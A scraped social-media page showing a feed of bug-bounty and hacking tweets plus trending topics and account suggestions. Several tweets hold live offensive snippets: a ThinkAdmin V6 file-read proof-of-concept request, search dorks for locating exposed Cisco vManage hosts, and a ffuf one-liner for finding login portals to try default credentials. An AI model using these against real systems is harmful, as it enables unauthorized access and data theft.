You might like
🍃 Are you stuck on authorization bypass in a Spring app? This tip can be helpful to you!
I found a vulnerability in #Azure allowing me to access Azure accounts of companies worth billions We all know vulnerabilities exist. This isn't an injection, XSS, or RCE. But the crazy thing about it? It took 2 hours to discover. 🤯 Here's the story of #AutoWarp👇 (1/10)
Wordpress Plugin Update Confusion - The full guide on how to scan and mitigate the next Big Supply chain Attack galnagli.com/Wordpress_Plug… #BugBounty
4 years of college turned an extrovert into an introvert
A Thread about Blind XSS tips Pro Tip: Bookmark this tweet!
New attacks on OAuth: SSRF by design and Session Poisoning by @artsploit portswigger.net/research/hidde…
Is “STILL” your favourite triager? @Hacker0x01 #bugbounty #vote #bugbountylife
Bruh I was today years old when I found out Mac books did this 🤯
Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies 👇Check the thread after reading for a few bonus facts👇 medium.com/@alex.birsan/d…
ThinkAdmin V6 Readfile? 🧐 Poc: GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 Reference: mp.weixin.qq.com/s/3t7r7FCirDEA… issues: github.com/zoujingli/Thin…
Bug hunters: Be ready for the SD-WAN exploit to drop. Large companies use this. Payouts could be big! 😉 Google intitle:"Cisco vManage" intitle:"Viptela vManage" Shodan title:"Viptela vManage" title:"Cisco vManage" title:vManage http.favicon.hash:-904700687 ssl:"O=Viptela Inc"
Why I love hacking IIS servers: - Case insensitive, amazing for content discovery - IIS Shortname - VIEWSTATE deserialization RCE gadget - Web.config upload tricks - Debug mode w/ detailed stack traces and full path - Debugging scripts often deployed (ELMAH, Trace) - Telerik RCE
My new favorite way to find login portals and search for default credentials. So far VERY useful and quick! cat hosts.txt | httprobe -c 300 | ffuf -w - -u FUZZ -mr "assword"
#BugBounty The day that you start looking for critical bugs you mindset is going to change and you eventually going to find somenthing good, but if you keep using your time looking open redirects you won't never level up, this is going to take time, but it will worth #infosec
I made my script public. It has all the detailed steps for setting up subdomain takeover automation for AWS, If you are interested. github.com/In3tinct/Taken
github.com
GitHub - In3tinct/Taken: Takeover subdomains using AWS dangling elastic ips and have a working POC...
Takeover subdomains using AWS dangling elastic ips and have a working POC for Subdomain Takeover. - In3tinct/Taken
United States Trends
- 1. Epstein 655K posts
- 2. Steam Machine 30.6K posts
- 3. Bradley Beal 2,278 posts
- 4. Boebert 19.8K posts
- 5. Valve 21.8K posts
- 6. Virginia Giuffre 35.9K posts
- 7. #BLACKROCK_NXXT N/A
- 8. Anthony Joshua 1,458 posts
- 9. Scott Boras N/A
- 10. Rosalina 62.2K posts
- 11. GabeCube 1,911 posts
- 12. Mace 27.3K posts
- 13. Mel Tucker N/A
- 14. Clinton 103K posts
- 15. H-1B 92.4K posts
- 16. Jordan Humphrey N/A
- 17. #NASDAQ_NXXT N/A
- 18. GPT-5.1 3,513 posts
- 19. AJ Brown 8,392 posts
- 20. Brad Beal N/A
You might like
-
𓆩SคᴛᎥຮн𓆪
@stish834 -
saransh
@saransh12141 -
Aniket Akhade
@_Aniket_Akhade_ -
⚡🌌🌌teslatheg0d🌌🌌⚡
@TeslaTheGod -
MIDHUN
@MrG6OOT -
0xhollow
@0x_hollow -
Rafin Rahman Chy
@rafinrahmanchy -
have_best_goats
@have_best_goats -
c3phas
@c3ph_ -
Tannay Bagga
@BaggaTannay -
Chetan Rawat
@noobie_maniac -
mubassirpatel
@Mubassirpatel1
Something went wrong.
Something went wrong.